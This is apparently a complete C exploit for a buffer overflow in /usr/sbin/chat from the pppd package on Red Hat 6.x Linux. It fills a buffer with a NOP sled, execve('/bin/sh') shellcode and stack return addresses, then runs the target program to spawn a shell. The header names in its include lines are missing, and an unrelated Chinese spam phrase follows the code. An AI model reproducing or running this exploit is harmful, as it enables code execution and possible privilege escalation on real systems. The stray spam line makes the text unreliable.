/* * A buffer overflow exists in the /usr/sbin/chat program * this comes as part of the pppd package which is installed * by default on Redhat linux and proberly others tested on * Redhat 6.2 proberly works on redhat 6.x - 8.x and any * other linux with this package installed. * NOTE : THIS PROGRAM IS NOT SUID BY DEFAULT * Faulty - www.b0f.net * b0fnet@yahoo.com */ #include #include #include #define BSIZE 1032 #define ALIGN 0 #define OFFSET 0 //offset unsigned char shellcode[] = "\xeb\x16\x31\xdb\x31\xc9\xf7\xe1" "\x5b\xb0\x0b\x88\x53\x07\x52\x53" "\x89\xe1\xcd\x80\xb0\x01\xcd\x80" "\xe8\xe5\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } int main(int argc, char **argv) { char *buffer; int i; int bsize = BSIZE; int align = ALIGN; int offset = OFFSET; unsigned long addr; if(argc > 1) bsize = atoi(argv[1]); buffer = (char *)malloc(bsize); bzero(buffer, bsize); memset(buffer, 0x90, bsize); addr = get_sp() - offset; *(unsigned long *)&buffer[bsize - 4] = addr; *(unsigned long *)&buffer[bsize - 8] = addr; printf("/usr/sbin/chat Sploit by Faulty www.b0f.net\n"); memcpy(buffer + bsize - 8 - align - strlen(shellcode), shellcode, strlen(shellcode)); execl("/usr/sbin/chat", "chat", buffer, NULL); return 0; }

亚洲欧美在线